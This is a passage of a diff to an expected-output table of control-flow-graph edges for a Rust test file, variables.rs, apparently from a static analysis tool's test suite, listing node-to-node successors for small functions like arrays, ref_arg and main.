match | -| variables.rs:520:15:520:33 | MyStruct {...} | variables.rs:520:7:520:11 | a | | -| variables.rs:520:31:520:31 | 1 | variables.rs:520:15:520:33 | MyStruct {...} | | -| variables.rs:521:3:521:3 | a | variables.rs:521:3:521:9 | ... .bar(...) | | -| variables.rs:521:3:521:9 | ... .bar(...) | variables.rs:523:3:523:19 | ExprStmt | | -| variables.rs:521:3:521:10 | ExprStmt | variables.rs:521:3:521:3 | a | | -| variables.rs:523:3:523:11 | print_i64 | variables.rs:523:13:523:13 | a | | -| variables.rs:523:3:523:18 | print_i64(...) | variables.rs:519:30:524:1 | { ... } | | -| variables.rs:523:3:523:19 | ExprStmt | variables.rs:523:3:523:11 | print_i64 | | -| variables.rs:523:13:523:13 | a | variables.rs:523:13:523:17 | a.val | | -| variables.rs:523:13:523:17 | a.val | variables.rs:523:3:523:18 | print_i64(...) | | -| variables.rs:526:1:560:1 | enter fn main | variables.rs:527:5:527:25 | ExprStmt | | -| variables.rs:526:1:560:1 | exit fn main (normal) | variables.rs:526:1:560:1 | exit fn main | | -| variables.rs:526:11:560:1 | { ... } | variables.rs:526:1:560:1 | exit fn main (normal) | | -| variables.rs:527:5:527:22 | immutable_variable | variables.rs:527:5:527:24 | immutable_variable(...) | | -| variables.rs:527:5:527:24 | immutable_variable(...) | variables.rs:528:5:528:23 | ExprStmt | | -| variables.rs:527:5:527:25 | ExprStmt | variables.rs:527:5:527:22 | immutable_variable | | -| variables.rs:528:5:528:20 | mutable_variable | variables.rs:528:5:528:22 | mutable_variable(...) | | -| variables.rs:528:5:528:22 | mutable_variable(...) | variables.rs:529:5:529:40 | ExprStmt | | -| variables.rs:528:5:528:23 | ExprStmt | variables.rs:528:5:528:20 | mutable_variable | | -| variables.rs:529:5:529:37 | mutable_variable_immutable_borrow | variables.rs:529:5:529:39 | mutable_variable_immutable_borrow(...) | | -| variables.rs:529:5:529:39 | mutable_variable_immutable_borrow(...) | variables.rs:530:5:530:23 | ExprStmt | | -| variables.rs:529:5:529:40 | ExprStmt | variables.rs:529:5:529:37 | mutable_variable_immutable_borrow | | -| variables.rs:530:5:530:20 | variable_shadow1 | variables.rs:530:5:530:22 | variable_shadow1(...) | | -| variables.rs:530:5:530:22 | variable_shadow1(...) | variables.rs:531:5:531:23 | ExprStmt | | -| variables.rs:530:5:530:23 | ExprStmt | variables.rs:530:5:530:20 | variable_shadow1 | | -| variables.rs:531:5:531:20 | variable_shadow2 | variables.rs:531:5:531:22 | variable_shadow2(...) | | -| variables.rs:531:5:531:22 | variable_shadow2(...) | variables.rs:532:5:532:19 | ExprStmt | | -| variables.rs:531:5:531:23 | ExprStmt | variables.rs:531:5:531:20 | variable_shadow2 | | -| variables.rs:532:5:532:16 | let_pattern1 | variables.rs:532:5:532:18 | let_pattern1(...) | | -| variables.rs:532:5:532:18 | let_pattern1(...) | variables.rs:533:5:533:19 | ExprStmt | | -| variables.rs:532:5:532:19 | ExprStmt | variables.rs:532:5:532:16 | let_pattern1 | | -| variables.rs:533:5:533:16 | let_pattern2 | variables.rs:533:5:533:18 | let_pattern2(...) | | -| variables.rs:533:5:533:18 | let_pattern2(...) | variables.rs:534:5:534:19 | ExprStmt | | -| variables.rs:533:5:533:19 | ExprStmt | variables.rs:533:5:533:16 | let_pattern2 | | -| variables.rs:534:5:534:16 | let_pattern3 | variables.rs:534:5:534:18 | let_pattern3(...) | | -| variables.rs:534:5:534:18 | let_pattern3(...) | variables.rs:535:5:535:19 | ExprStmt | | -| variables.rs:534:5:534:19 | ExprStmt | variables.rs:534:5:534:16 | let_pattern3 | | -| variables.rs:535:5:535:16 | let_pattern4 | variables.rs:535:5:535:18 | let_pattern4(...) | | -| variables.rs:535:5:535:18 | let_pattern4(...) | variables.rs:536:5:536:21 | ExprStmt | | -| variables.rs:535:5:535:19 | ExprStmt | variables.rs:535:5:535:16 | let_pattern4 | | -| variables.rs:536:5:536:18 | match_pattern1 | variables.rs:536:5:536:20 | match_pattern1(...) | | -| variables.rs:536:5:536:20 | match_pattern1(...) | variables.rs:537:5:537:21 | ExprStmt | | -| variables.rs:536:5:536:21 | ExprStmt | variables.rs:536:5:536:18 | match_pattern1 | | -| variables.rs:537:5:537:18 | match_pattern2 | variables.rs:537:5:537:20 | match_pattern2(...) | | -| variables.rs:537:5:537:20 | match_pattern2(...) | variables.rs:538:5:538:21 | ExprStmt | | -| variables.rs:537:5:537:21 | ExprStmt | variables.rs:537:5:537:18 | match_pattern2 | | -| variables.rs:538:5:538:18 | match_pattern3 | variables.rs:538:5:538:20 | match_pattern3(...) | | -| variables.rs:538:5:538:20 | match_pattern3(...) | variables.rs:539:5:539:21 | ExprStmt | | -| variables.rs:538:5:538:21 | ExprStmt | variables.rs:538:5:538:18 | match_pattern3 | | -| variables.rs:539:5:539:18 | match_pattern4 | variables.rs:539:5:539:20 | match_pattern4(...) | | -| variables.rs:539:5:539:20 | match_pattern4(...) | variables.rs:540:5:540:21 | ExprStmt | | -| variables.rs:539:5:539:21 | ExprStmt | variables.rs:539:5:539:18 | match_pattern4 | | -| variables.rs:540:5:540:18 | match_pattern5 | variables.rs:540:5:540:20 | match_pattern5(...) | | -| variables.rs:540:5:540:20 | match_pattern5(...) | variables.rs:541:5:541:21 | ExprStmt | | -| variables.rs:540:5:540:21 | ExprStmt | variables.rs:540:5:540:18 | match_pattern5 | | -| variables.rs:541:5:541:18 | match_pattern6 | variables.rs:541:5:541:20 | match_pattern6(...) | | -| variables.rs:541:5:541:20 | match_pattern6(...) | variables.rs:542:5:542:21 | ExprStmt | | -| variables.rs:541:5:541:21 | ExprStmt | variables.rs:541:5:541:18 | match_pattern6 | | -| variables.rs:542:5:542:18 | match_pattern7 | variables.rs:542:5:542:20 | match_pattern7(...) | | -| variables.rs:542:5:542:20 | match_pattern7(...) | variables.rs:543:5:543:21 | ExprStmt | | -| variables.rs:542:5:542:21 | ExprStmt | variables.rs:542:5:542:18 | match_pattern7 | | -| variables.rs:543:5:543:18 | match_pattern8 | variables.rs:543:5:543:20 | match_pattern8(...) | | -| variables.rs:543:5:543:20 | match_pattern8(...) | variables.rs:544:5:544:21 | ExprStmt | | -| variables.rs:543:5:543:21 | ExprStmt | variables.rs:543:5:543:18 | match_pattern8 | | -| variables.rs:544:5:544:18 | match_pattern9 | variables.rs:544:5:544:20 | match_pattern9(...) | | -| variables.rs:544:5:544:20 | match_pattern9(...) | variables.rs:545:5:545:36 | ExprStmt | | -| variables.rs:544:5:544:21 | ExprStmt | variables.rs:544:5:544:18 | match_pattern9 | | -| variables.rs:545:5:545:18 | param_pattern1 | variables.rs:545:20:545:22 | "a" | | -| variables.rs:545:5:545:35 | param_pattern1(...) | variables.rs:546:5:546:37 | ExprStmt | | -| variables.rs:545:5:545:36 | ExprStmt | variables.rs:545:5:545:18 | param_pattern1 | | -| variables.rs:545:20:545:22 | "a" | variables.rs:545:26:545:28 | "b" | | -| variables.rs:545:25:545:34 | TupleExpr | variables.rs:545:5:545:35 | param_pattern1(...) | | -| variables.rs:545:26:545:28 | "b" | variables.rs:545:31:545:33 | "c" | | -| variables.rs:545:31:545:33 | "c" | variables.rs:545:25:545:34 | TupleExpr | | -| variables.rs:546:5:546:18 | param_pattern2 | variables.rs:546:20:546:31 | ...::Left | | -| variables.rs:546:5:546:36 | param_pattern2(...) | variables.rs:547:5:547:26 | ExprStmt | | -| variables.rs:546:5:546:37 | ExprStmt | variables.rs:546:5:546:18 | param_pattern2 | | -| variables.rs:546:20:546:31 | ...::Left | variables.rs:546:33:546:34 | 45 | | -| variables.rs:546:20:546:35 | ...::Left(...) | variables.rs:546:5:546:36 | param_pattern2(...) | | -| variables.rs:546:33:546:34 | 45 | variables.rs:546:20:546:35 | ...::Left(...) | | -| variables.rs:547:5:547:23 | destruct_assignment | variables.rs:547:5:547:25 | destruct_assignment(...) | | -| variables.rs:547:5:547:25 | destruct_assignment(...) | variables.rs:548:5:548:23 | ExprStmt | | -| variables.rs:547:5:547:26 | ExprStmt | variables.rs:547:5:547:23 | destruct_assignment | | -| variables.rs:548:5:548:20 | closure_variable | variables.rs:548:5:548:22 | closure_variable(...) | | -| variables.rs:548:5:548:22 | closure_variable(...) | variables.rs:549:5:549:19 | ExprStmt | | -| variables.rs:548:5:548:23 | ExprStmt | variables.rs:548:5:548:20 | closure_variable | | -| variables.rs:549:5:549:16 | for_variable | variables.rs:549:5:549:18 | for_variable(...) | | -| variables.rs:549:5:549:18 | for_variable(...) | variables.rs:550:5:550:17 | ExprStmt | | -| variables.rs:549:5:549:19 | ExprStmt | variables.rs:549:5:549:16 | for_variable | | -| variables.rs:550:5:550:14 | add_assign | variables.rs:550:5:550:16 | add_assign(...) | | -| variables.rs:550:5:550:16 | add_assign(...) | variables.rs:551:5:551:13 | ExprStmt | | -| variables.rs:550:5:550:17 | ExprStmt | variables.rs:550:5:550:14 | add_assign | | -| variables.rs:551:5:551:10 | mutate | variables.rs:551:5:551:12 | mutate(...) | | -| variables.rs:551:5:551:12 | mutate(...) | variables.rs:552:5:552:17 | ExprStmt | | -| variables.rs:551:5:551:13 | ExprStmt | variables.rs:551:5:551:10 | mutate | | -| variables.rs:552:5:552:14 | mutate_arg | variables.rs:552:5:552:16 | mutate_arg(...) | | -| variables.rs:552:5:552:16 | mutate_arg(...) | variables.rs:553:5:553:12 | ExprStmt | | -| variables.rs:552:5:552:17 | ExprStmt | variables.rs:552:5:552:14 | mutate_arg | | -| variables.rs:553:5:553:9 | alias | variables.rs:553:5:553:11 | alias(...) | | -| variables.rs:553:5:553:11 | alias(...) | variables.rs:554:5:554:18 | ExprStmt | | -| variables.rs:553:5:553:12 | ExprStmt | variables.rs:553:5:553:9 | alias | | -| variables.rs:554:5:554:15 | capture_mut | variables.rs:554:5:554:17 | capture_mut(...) | | -| variables.rs:554:5:554:17 | capture_mut(...) | variables.rs:555:5:555:20 | ExprStmt | | -| variables.rs:554:5:554:18 | ExprStmt | variables.rs:554:5:554:15 | capture_mut | | -| variables.rs:555:5:555:17 | capture_immut | variables.rs:555:5:555:19 | capture_immut(...) | | -| variables.rs:555:5:555:19 | capture_immut(...) | variables.rs:556:5:556:26 | ExprStmt | | -| variables.rs:555:5:555:20 | ExprStmt | variables.rs:555:5:555:17 | capture_immut | | -| variables.rs:556:5:556:23 | async_block_capture | variables.rs:556:5:556:25 | async_block_capture(...) | | -| variables.rs:556:5:556:25 | async_block_capture(...) | variables.rs:557:5:557:14 | ExprStmt | | -| variables.rs:556:5:556:26 | ExprStmt | variables.rs:556:5:556:23 | async_block_capture | | -| variables.rs:557:5:557:11 | structs | variables.rs:557:5:557:13 | structs(...) | | -| variables.rs:557:5:557:13 | structs(...) | variables.rs:558:5:558:14 | ExprStmt | | -| variables.rs:557:5:557:14 | ExprStmt | variables.rs:557:5:557:11 | structs | | -| variables.rs:558:5:558:11 | ref_arg | variables.rs:558:5:558:13 | ref_arg(...) | | -| variables.rs:558:5:558:13 | ref_arg(...) | variables.rs:559:5:559:30 | ExprStmt | | -| variables.rs:558:5:558:14 | ExprStmt | variables.rs:558:5:558:11 | ref_arg | | -| variables.rs:559:5:559:27 | ref_methodcall_receiver | variables.rs:559:5:559:29 | ref_methodcall_receiver(...) | | -| variables.rs:559:5:559:29 | ref_methodcall_receiver(...) | variables.rs:526:11:560:1 | { ... } | | -| variables.rs:559:5:559:30 | ExprStmt | variables.rs:559:5:559:27 | ref_methodcall_receiver | | +| variables.rs:500:1:507:1 | enter fn arrays | variables.rs:501:5:501:26 | let ... = ... | | +| variables.rs:500:1:507:1 | exit fn arrays (normal) | variables.rs:500:1:507:1 | exit fn arrays | | +| variables.rs:500:13:507:1 | { ... } | variables.rs:500:1:507:1 | exit fn arrays (normal) | | +| variables.rs:501:5:501:26 | let ... = ... | variables.rs:501:18:501:18 | 1 | | +| variables.rs:501:9:501:13 | a | variables.rs:502:5:502:20 | ExprStmt | match | +| variables.rs:501:17:501:25 | [...] | variables.rs:501:9:501:13 | a | | +| variables.rs:501:18:501:18 | 1 | variables.rs:501:21:501:21 | 2 | | +| variables.rs:501:21:501:21 | 2 | variables.rs:501:24:501:24 | 3 | | +| variables.rs:501:24:501:24 | 3 | variables.rs:501:17:501:25 | [...] | | +| variables.rs:502:5:502:13 | print_i64 | variables.rs:502:15:502:15 | a | | +| variables.rs:502:5:502:19 | print_i64(...) | variables.rs:503:5:503:13 | ExprStmt | | +| variables.rs:502:5:502:20 | ExprStmt | variables.rs:502:5:502:13 | print_i64 | | +| variables.rs:502:15:502:15 | a | variables.rs:502:17:502:17 | 0 | | +| variables.rs:502:15:502:18 | a[0] | variables.rs:502:5:502:19 | print_i64(...) | | +| variables.rs:502:17:502:17 | 0 | variables.rs:502:15:502:18 | a[0] | | +| variables.rs:503:5:503:5 | a | variables.rs:503:7:503:7 | 1 | | +| variables.rs:503:5:503:8 | a[1] | variables.rs:503:12:503:12 | 5 | | +| variables.rs:503:5:503:12 | ... = ... | variables.rs:504:5:504:20 | ExprStmt | | +| variables.rs:503:5:503:13 | ExprStmt | variables.rs:503:5:503:5 | a | | +| variables.rs:503:7:503:7 | 1 | variables.rs:503:5:503:8 | a[1] | | +| variables.rs:503:12:503:12 | 5 | variables.rs:503:5:503:12 | ... = ... | | +| variables.rs:504:5:504:13 | print_i64 | variables.rs:504:15:504:15 | a | | +| variables.rs:504:5:504:19 | print_i64(...) | variables.rs:505:5:505:18 | ExprStmt | | +| variables.rs:504:5:504:20 | ExprStmt | variables.rs:504:5:504:13 | print_i64 | | +| variables.rs:504:15:504:15 | a | variables.rs:504:17:504:17 | 1 | | +| variables.rs:504:15:504:18 | a[1] | variables.rs:504:5:504:19 | print_i64(...) | | +| variables.rs:504:17:504:17 | 1 | variables.rs:504:15:504:18 | a[1] | | +| variables.rs:505:5:505:5 | a | variables.rs:505:10:505:10 | 4 | | +| variables.rs:505:5:505:17 | ... = ... | variables.rs:506:5:506:20 | ExprStmt | | +| variables.rs:505:5:505:18 | ExprStmt | variables.rs:505:5:505:5 | a | | +| variables.rs:505:9:505:17 | [...] | variables.rs:505:5:505:17 | ... = ... | | +| variables.rs:505:10:505:10 | 4 | variables.rs:505:13:505:13 | 5 | | +| variables.rs:505:13:505:13 | 5 | variables.rs:505:16:505:16 | 6 | | +| variables.rs:505:16:505:16 | 6 | variables.rs:505:9:505:17 | [...] | | +| variables.rs:506:5:506:13 | print_i64 | variables.rs:506:15:506:15 | a | | +| variables.rs:506:5:506:19 | print_i64(...) | variables.rs:500:13:507:1 | { ... } | | +| variables.rs:506:5:506:20 | ExprStmt | variables.rs:506:5:506:13 | print_i64 | | +| variables.rs:506:15:506:15 | a | variables.rs:506:17:506:17 | 2 | | +| variables.rs:506:15:506:18 | a[2] | variables.rs:506:5:506:19 | print_i64(...) | | +| variables.rs:506:17:506:17 | 2 | variables.rs:506:15:506:18 | a[2] | | +| variables.rs:509:1:516:1 | enter fn ref_arg | variables.rs:510:5:510:15 | let ... = 16 | | +| variables.rs:509:1:516:1 | exit fn ref_arg (normal) | variables.rs:509:1:516:1 | exit fn ref_arg | | +| variables.rs:509:14:516:1 | { ... } | variables.rs:509:1:516:1 | exit fn ref_arg (normal) | | +| variables.rs:510:5:510:15 | let ... = 16 | variables.rs:510:13:510:14 | 16 | | +| variables.rs:510:9:510:9 | x | variables.rs:511:5:511:22 | ExprStmt | match | +| variables.rs:510:13:510:14 | 16 | variables.rs:510:9:510:9 | x | | +| variables.rs:511:5:511:17 | print_i64_ref | variables.rs:511:20:511:20 | x | | +| variables.rs:511:5:511:21 | print_i64_ref(...) | variables.rs:512:5:512:17 | ExprStmt | | +| variables.rs:511:5:511:22 | ExprStmt | variables.rs:511:5:511:17 | print_i64_ref | | +| variables.rs:511:19:511:20 | &x | variables.rs:511:5:511:21 | print_i64_ref(...) | | +| variables.rs:511:20:511:20 | x | variables.rs:511:19:511:20 | &x | | +| variables.rs:512:5:512:13 | print_i64 | variables.rs:512:15:512:15 | x | | +| variables.rs:512:5:512:16 | print_i64(...) | variables.rs:514:5:514:15 | let ... = 17 | | +| variables.rs:512:5:512:17 | ExprStmt | variables.rs:512:5:512:13 | print_i64 | | +| variables.rs:512:15:512:15 | x | variables.rs:512:5:512:16 | print_i64(...) | | +| variables.rs:514:5:514:15 | let ... = 17 | variables.rs:514:13:514:14 | 17 | | +| variables.rs:514:9:514:9 | z | variables.rs:515:5:515:22 | ExprStmt | match | +| variables.rs:514:13:514:14 | 17 | variables.rs:514:9:514:9 | z | | +| variables.rs:515:5:515:17 | print_i64_ref | variables.rs:515:20:515:20 | z | | +| variables.rs:515:5:515:21 | print_i64_ref(...) | variables.rs:509:14:516:1 | { ... } | | +| variables.rs:515:5:515:22 | ExprStmt | variables.rs:515:5:515:17 | print_i64_ref | | +| variables.rs:515:19:515:20 | &z | variables.rs:515:5:515:21 | print_i64_ref(...) | | +| variables.rs:515:20:515:20 | z | variables.rs:515:19:515:20 | &z | | +| variables.rs:523:3:525:3 | enter fn bar | variables.rs:523:15:523:18 | self | | +| variables.rs:523:3:525:3 | exit fn bar (normal) | variables.rs:523:3:525:3 | exit fn bar | | +| variables.rs:523:10:523:18 | SelfParam | variables.rs:524:5:524:32 | ExprStmt | | +| variables.rs:523:15:523:18 | self | variables.rs:523:10:523:18 | SelfParam | | +| variables.rs:523:21:525:3 | { ... } | variables.rs:523:3:525:3 | exit fn bar (normal) | | +| variables.rs:524:5:524:9 | * ... | variables.rs:524:29:524:29 | 3 | | +| variables.rs:524:5:524:31 | ... = ... | variables.rs:523:21:525:3 | { ... } | | +| variables.rs:524:5:524:32 | ExprStmt | variables.rs:524:6:524:9 | self | | +| variables.rs:524:6:524:9 | self | variables.rs:524:5:524:9 | * ... | | +| variables.rs:524:13:524:31 | MyStruct {...} | variables.rs:524:5:524:31 | ... = ... | | +| variables.rs:524:29:524:29 | 3 | variables.rs:524:13:524:31 | MyStruct {...} | | +| variables.rs:528:1:533:1 | enter fn ref_methodcall_receiver | variables.rs:529:3:529:34 | let ... = ... | | +| variables.rs:528:1:533:1 | exit fn ref_methodcall_receiver (normal) | variables.rs:528:1:533:1 | exit fn ref_methodcall_receiver | | +| variables.rs:528:30:533:1 | { ... } | variables.rs:528:1:533:1 | exit fn ref_methodcall_receiver (normal) | | +| variables.rs:529:3:529:34 | let ... = ... | variables.rs:529:31:529:31 | 1 | | +| variables.rs:529:7:529:11 | a | variables.rs:530:3:530:10 | ExprStmt | match | +| variables.rs:529:15:529:33 | MyStruct {...} | variables.rs:529:7:529:11 | a | | +| variables.rs:529:31:529:31 | 1 | variables.rs:529:15:529:33 | MyStruct {...} | | +| variables.rs:530:3:530:3 | a | variables.rs:530:3:530:9 | ... .bar(...) | | +| variables.rs:530:3:530:9 | ... .bar(...) | variables.rs:532:3:532:19 | ExprStmt | | +| variables.rs:530:3:530:10 | ExprStmt | variables.rs:530:3:530:3 | a | | +| variables.rs:532:3:532:11 | print_i64 | variables.rs:532:13:532:13 | a | | +| variables.rs:532:3:532:18 | print_i64(...) | variables.rs:528:30:533:1 | { ... } | | +| variables.rs:532:3:532:19 | ExprStmt | variables.rs:532:3:532:11 | print_i64 | | +| variables.rs:532:13:532:13 | a | variables.rs:532:13:532:17 | a.val | | +| variables.rs:532:13:532:17 | a.val | variables.rs:532:3:532:18 | print_i64(...) | | +| variables.rs:535:1:569:1 | enter fn main | variables.rs:536:5:536:25 | ExprStmt | | +| variables.rs:535:1:569:1 | exit fn main (normal) | variables.rs:535:1:569:1 | exit fn main | | +| variables.rs:535:11:569:1 | { ... } | variables.rs:535:1:569:1 | exit fn main (normal) | | +| variables.rs:536:5:536:22 | immutable_variable | variables.rs:536:5:536:24 | immutable_variable(...) | | +| variables.rs:536:5:536:24 | immutable_variable(...) | variables.rs:537:5:537:23 | ExprStmt | | +| variables.rs:536:5:536:25 | ExprStmt | variables.rs:536:5:536:22 | immutable_variable | | +| variables.rs:537:5:537:20 | mutable_variable | variables.rs:537:5:537:22 | mutable_variable(...) | | +| variables.rs:537:5:537:22 | mutable_variable(...) | variables.rs:538:5:538:40 | ExprStmt | | +| variables.rs:537:5:537:23 | ExprStmt | variables.rs:537:5:537:20 | mutable_variable | | +| variables.rs:538:5:538:37 | mutable_variable_immutable_borrow | variables.rs:538:5:538:39 | mutable_variable_immutable_borrow(...) | | +| variables.rs:538:5:538:39 | mutable_variable_immutable_borrow(...) | variables.rs:539:5:539:23 | ExprStmt | | +| variables.rs:538:5:538:40 | ExprStmt | variables.rs:538:5:538:37 | mutable_variable_immutable_borrow | | +| variables.rs:539:5:539:20 | variable_shadow1 | variables.rs:539:5:539:22 | variable_shadow1(...) | | +| variables.rs:539:5:539:22 | variable_shadow1(...) | variables.rs:540:5:540:23 | ExprStmt | | +| variables.rs:539:5:539:23 | ExprStmt | variables.rs:539:5:539:20 | variable_shadow1 | | +| variables.rs:540:5:540:20 | variable_shadow2 | variables.rs:540:5:540:22 | variable_shadow2(...) | | +| variables.rs:540:5:540:22 | variable_shadow2(...) | variables.rs:541:5:541:19 | ExprStmt | | +| variables.rs:540:5:540:23 | ExprStmt | variables.rs:540:5:540:20 | variable_shadow2 | | +| variables.rs:541:5:541:16 | let_pattern1 | variables.rs:541:5:541:18 | let_pattern1(...) | | +| variables.rs:541:5:541:18 | let_pattern1(...) | variables.rs:542:5:542:19 | ExprStmt | | +| variables.rs:541:5:541:19 | ExprStmt | variables.rs:541:5:541:16 | let_pattern1 | | +| variables.rs:542:5:542:16 | let_pattern2 | variables.rs:542:5:542:18 | let_pattern2(...) | | +| variables.rs:542:5:542:18 | let_pattern2(...) | variables.rs:543:5:543:19 | ExprStmt | | +| variables.rs:542:5:542:19 | ExprStmt | variables.rs:542:5:542:16 | let_pattern2 | | +| variables.rs:543:5:543:16 | let_pattern3 | variables.rs:543:5:543:18 | let_pattern3(...) | | +| variables.rs:543:5:543:18 | let_pattern3(...) | variables.rs:544:5:544:19 | ExprStmt | | +| variables.rs:543:5:543:19 | ExprStmt | variables.rs:543:5:543:16 | let_pattern3 | | +| variables.rs:544:5:544:16 | let_pattern4 | variables.rs:544:5:544:18 | let_pattern4(...) | | +| variables.rs:544:5:544:18 | let_pattern4(...) | variables.rs:545:5:545:21 | ExprStmt | | +| variables.rs:544:5:544:19 | ExprStmt | variables.rs:544:5:544:16 | let_pattern4 | | +| variables.rs:545:5:545:18 | match_pattern1 | variables.rs:545:5:545:20 | match_pattern1(...) | | +| variables.rs:545:5:545:20 | match_pattern1(...) | variables.rs:546:5:546:21 | ExprStmt | | +| variables.rs:545:5:545:21 | ExprStmt | variables.rs:545:5:545:18 | match_pattern1 | | +| variables.rs:546:5:546:18 | match_pattern2 | variables.rs:546:5:546:20 | match_pattern2(...) | | +| variables.rs:546:5:546:20 | match_pattern2(...) | variables.rs:547:5:547:21 | ExprStmt | | +| variables.rs:546:5:546:21 | ExprStmt | variables.rs:546:5:546:18 | match_pattern2 | | +| variables.rs:547:5:547:18 | match_pattern3 | variables.rs:547:5:547:20 | match_pattern3(...) | | +| variables.rs:547:5:547:20 | match_pattern3(...) | variables.rs:548:5:548:21 | ExprStmt | | +| variables.rs:547:5:547:21 | ExprStmt | variables.rs:547:5:547:18 | match_pattern3 | | +| variables.rs:548:5:548:18 | match_pattern4 | variables.rs:548:5:548:20 | match_pattern4(...) | | +| variables.rs:548:5:548:20 | match_pattern4(...) | variables.rs:549:5:549:21 | ExprStmt | | +| variables.rs:548:5:548:21 | ExprStmt | variables.rs:548:5:548:18 | match_pattern4 | | +| variables.rs:549:5:549:18 | match_pattern5 | variables.rs:549:5:549:20 | match_pattern5(...) | | +| variables.rs:549:5:549:20 | match_pattern5(...) | variables.rs:550:5:550:21 | ExprStmt | | +| variables.rs:549:5:549:21 | ExprStmt | variables.rs:549:5:549:18 | match_pattern5 | | +| variables.rs:550:5:550:18 | match_pattern6 | variables.rs:550:5:550:20 | match_pattern6(...) | | +| variables.rs:550:5:550:20 | match_pattern6(...) | variables.rs:551:5:551:21 | ExprStmt | | +| variables.rs:550:5:550:21 | ExprStmt | variables.rs:550:5:550:18 | match_pattern6 | | +| variables.rs:551:5:551:18 | match_pattern7 | variables.rs:551:5:551:20 | match_pattern7(...) | | +| variables.rs:551:5:551:20 | match_pattern7(...) | variables.rs:552:5:552:21 | ExprStmt | | +| variables.rs:551:5:551:21 | ExprStmt | variables.rs:551:5:551:18 | match_pattern7 | | +| variables.rs:552:5:552:18 | match_pattern8 | variables.rs:552:5:552:20 | match_pattern8(...) | | +| variables.rs:552:5:552:20 | match_pattern8(...) | variables.rs:553:5:553:21 | ExprStmt | | +| variables.rs:552:5:552:21 | ExprStmt | variables.rs:552:5:552:18 | match_pattern8 | | +| variables.rs:553:5:553:18 | match_pattern9 | variables.rs:553:5:553:20 | match_pattern9(...) | | +| variables.rs:553:5:553:20 | match_pattern9(...) | variables.rs:554:5:554:36 | ExprStmt | | +| variables.rs:553:5:553:21 | ExprStmt | variables.rs:553:5:553:18 | match_pattern9 | | +| variables.rs:554:5:554:18 | param_pattern1 | variables.rs:554:20:554:22 | "a" | | +| variables.rs:554:5:554:35 | param_pattern1(...) | variables.rs:555:5:555:37 | ExprStmt | | +| variables.rs:554:5:554:36 | ExprStmt | variables.rs:554:5:554:18 | param_pattern1 | | +| variables.rs:554:20:554:22 | "a" | variables.rs:554:26:554:28 | "b" | | +| variables.rs:554:25:554:34 | TupleExpr | variables.rs:554:5:554:35 | param_pattern1(...) | | +| variables.rs:554:26:554:28 | "b" | variables.rs:554:31:554:33 | "c" | | +| variables.rs:554:31:554:33 | "c" | variables.rs:554:25:554:34 | TupleExpr | | +| variables.rs:555:5:555:18 | param_pattern2 | variables.rs:555:20:555:31 | ...::Left | | +| variables.rs:555:5:555:36 | param_pattern2(...) | variables.rs:556:5:556:26 | ExprStmt | | +| variables.rs:555:5:555:37 | ExprStmt | variables.rs:555:5:555:18 | param_pattern2 | | +| variables.rs:555:20:555:31 | ...::Left | variables.rs:555:33:555:34 | 45 | | +| variables.rs:555:20:555:35 | ...::Left(...) | variables.rs:555:5:555:36 | param_pattern2(...) | | +| variables.rs:555:33:555:34 | 45 | variables.rs:555:20:555:35 | ...::Left(...) | | +| variables.rs:556:5:556:23 | destruct_assignment | variables.rs:556:5:556:25 | destruct_assignment(...) | | +| variables.rs:556:5:556:25 | destruct_assignment(...) | variables.rs:557:5:557:23 | ExprStmt | | +| variables.rs:556:5:556:26 | ExprStmt | variables.rs:556:5:556:23 | destruct_assignment | | +| variables.rs:557:5:557:20 | closure_variable | variables.rs:557:5:557:22 | closure_variable(...) | | +| variables.rs:557:5:557:22 | closure_variable(...) | variables.rs:558:5:558:19 | ExprStmt | | +| variables.rs:557:5:557:23 | ExprStmt | variables.rs:557:5:557:20 | closure_variable | | +| variables.rs:558:5:558:16 | for_variable | variables.rs:558:5:558:18 | for_variable(...) | | +| variables.rs:558:5:558:18 | for_variable(...) | variables.rs:559:5:559:17 | ExprStmt | | +| variables.rs:558:5:558:19 | ExprStmt | variables.rs:558:5:558:16 | for_variable | | +| variables.rs:559:5:559:14 | add_assign | variables.rs:559:5:559:16 | add_assign(...) | | +| variables.rs:559:5:559:16 | add_assign(...) | variables.rs:560:5:560:13 | ExprStmt | | +| variables.rs:559:5:559:17 | ExprStmt | variables.rs:559:5:559:14 | add_assign | | +| variables.rs:560:5:560:10 | mutate | variables.rs:560:5:560:12 | mutate(...) | | +| variables.rs:560:5:560:12 | mutate(...) | variables.rs:561:5:561:17 | ExprStmt | | +| variables.rs:560:5:560:13 | ExprStmt | variables.rs:560:5:560:10 | mutate | | +| variables.rs:561:5:561:14 | mutate_arg | variables.rs:561:5:561:16 | mutate_arg(...) | | +| variables.rs:561:5:561:16 | mutate_arg(...) | variables.rs:562:5:562:12 | ExprStmt | | +| variables.rs:561:5:561:17 | ExprStmt | variables.rs:561:5:561:14 | mutate_arg | | +| variables.rs:562:5:562:9 | alias | variables.rs:562:5:562:11 | alias(...) | | +| variables.rs:562:5:562:11 | alias(...) | variables.rs:563:5:563:18 | ExprStmt | | +| variables.rs:562:5:562:12 | ExprStmt | variables.rs:562:5:562:9 | alias | | +| variables.rs:563:5:563:15 | capture_mut | variables.rs:563:5:563:17 | capture_mut(...) | | +| variables.rs:563:5:563:17 | capture_mut(...) | variables.rs:564:5:564:20 | ExprStmt | | +| variables.rs:563:5:563:18 | ExprStmt | variables.rs:563:5:563:15 | capture_mut | | +| variables.rs:564:5:564:17 | capture_immut | variables.rs:564:5:564:19 | capture_immut(...) | | +| variables.rs:564:5:564:19 | capture_immut(...) | variables.rs:565:5:565:26 | ExprStmt | | +| variables.rs:564:5:564:20 | ExprStmt | variables.rs:564:5:564:17 | capture_immut | | +| variables.rs:565:5:565:23 | async_block_capture | variables.rs:565:5:565:25 | async_block_capture(...) | | +| variables.rs:565:5:565:25 | async_block_capture(...) | variables.rs:566:5:566:14 | ExprStmt | | +| variables.rs:565:5:565:26 | ExprStmt | variables.rs:565:5:565:23 | async_block_capture | | +| variables.rs:566:5:566:11 | structs | variables.rs:566:5:566:13 | structs(...) | | +| variables.rs:566:5:566:13 | structs(...) | variables.rs:567:5:567:14 | ExprStmt | | +| variables.rs:566:5:566:14 | ExprStmt | variables.rs:566:5:566:11 | structs | | +| variables.rs:567:5:567:11 | ref_arg | variables.rs:567:5:567:13 | ref_arg(...) | | +| variables.rs:567:5:567:13 | ref_arg(...) | variables.rs:568:5:568:30 | ExprStmt | | +| variables.rs:567:5:567:14 | ExprStmt | variables.rs:567:5:567:11 | ref_arg | | +| variables.rs:568:5:568:27 | ref_methodcall_receiver | variables.rs:568:5:568:29 | ref_methodcall_receiver(...) | | +| variables.rs:568:5:568:29 | ref_methodcall_receiver(...) | 